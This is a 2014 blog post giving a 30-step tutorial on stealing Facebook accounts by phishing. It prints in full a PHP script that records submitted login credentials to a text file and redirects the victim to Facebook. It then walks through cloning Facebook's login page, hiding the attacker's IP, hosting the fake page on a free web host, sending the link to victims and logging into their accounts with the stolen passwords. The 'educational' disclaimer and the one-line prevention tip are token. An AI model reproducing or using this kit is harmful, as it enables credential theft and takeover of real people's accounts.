Disclaimer: This post has been created for the educational purpose. If you are misusing, you are completely responsible for any harm caused by it.

Friday, December 12, 2014

How to Hack a Facebook Account by Phishing?

Phishing is the activity of creating a fake log in page of the famous website like Facebook to hack the account of the users. In this attack users will be manipulated to type their email and password in the fake website that looks similar to
the original except the url.


Step 1
Open the Facebook log in page.

Step 2
Right click and click on view source.

Step 3
Select all and copy it in the notepad.

Step 4
Open the notepad and hit Control+ F

Step 5
Search for action="https://www.facebook.com/login.php?login_attempt=1''

Step 6
Replace it with action="post.php"

Step 7
Save it as index.htm

Step 8
Open blank notepad and paste the following php script.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

Step 9
Save it as post.php.

Step 10
Go to www.free-hideip.com to hide IP address.

Step 11
Surf www.000webhost.com from there.

Step 12
Open a free account there.

Step 13
Now go to CPanel

Step 14
Go to file manager.

Step 15
Go to public_html.

Step 16
Delete default.php

Step 17
Upload index.htm

Step 18
Upload post.php

Step 19
Click on the view of index.htm

Step 20
Copy the url.

Step 21
Send the url to the victim through Facebook message, email or SMS.

Step 22
Go to www.free-hideip.com again.

Step 23
Go to www.000webhost.com

Step 24
log in there with your credentials.

Step 25
Go to file manager.

Step 26
Go to public_html.

Step 27
Find username.txt.

Step 28
Click on the view.

Step 29
Copy the email and password of the victim there.

Step 30
Log in the Facebook account of the victim and change the password.

Prevention
Check the url of the Facebook before the log in.

Remedy
Contact Facebook Team.

2 comments:

  1. Really working now create for unlockingicloud as well

    ReplyDelete
  2. Ani wifi hack garni ko ni blog chaiyo from minar family

    ReplyDelete